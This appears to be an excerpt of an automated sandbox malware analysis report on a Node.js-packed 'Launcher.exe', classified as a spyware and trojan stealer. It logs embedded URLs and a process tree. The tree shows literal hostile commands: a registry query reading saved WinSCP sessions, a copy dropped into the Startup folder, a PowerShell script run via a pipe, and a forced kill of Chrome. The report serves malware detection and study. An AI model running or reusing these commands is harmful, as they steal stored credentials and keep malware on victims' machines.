          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/tarball/master
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Control-Flow)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Debugging)
          Source: Launcher.exe, 00000000.00000003.1108487541.00000174E005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg/issues/1589
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0888000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1210752491.00000174E0878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/webpack/webpack/issues/4175#issuecomment-342931035
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/willwhite)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yarnpkg/yarn)
          Source: Launcher.exe, 00000000.00000003.1175489451.00000174E0401000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E0934000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yetingli
          Source: Launcher.exe, 00000000.00000003.1140870149.00000174E0581000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05BF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yqnn/node-readdir-glob#options
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v3-green.svg)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v6-green.svg)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/github/release/TryGhost/node-sqlite3.svg)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150933749.00000174E0857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jquery.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/icon.svg
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150933749.00000174E0857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/license
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/)
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/http.html#http_message_headers
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html#node-api-version-matrix)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html)
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/zlib.html#zlib_class_options
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/latest/docs/api/n-api.html#n_api_n_api)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0-headers.tar.gz
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gz
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gzhttps://nodejs.org/download/release/v
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/win-x64/node.lib
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/~jpommerening
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
          Source: unknownHTTPS traffic detected: 144.2.14.25:443 -> 192.168.2.16:49795 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F4993A933_2_00007FFF8F4993A9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F4909B233_2_00007FFF8F4909B2
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041 0DE74A34D95A30EED84CDF31F0DC5868C59B7977D3D496845C9363812235B768
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442 F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
          Source: Launcher.exe, 00000000.00000000.1086952765.00007FF65ECDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProjectD vs Launcher.exe
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
          Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.winEXE@78/139@21/7
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg
          Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1358740310.00000174E09E8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
          Source: Launcher.exeVirustotal: Detection: 48%
          Source: Launcher.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exe
          Source: unknown Process created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,9387240218519264668,4487105206535593677,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
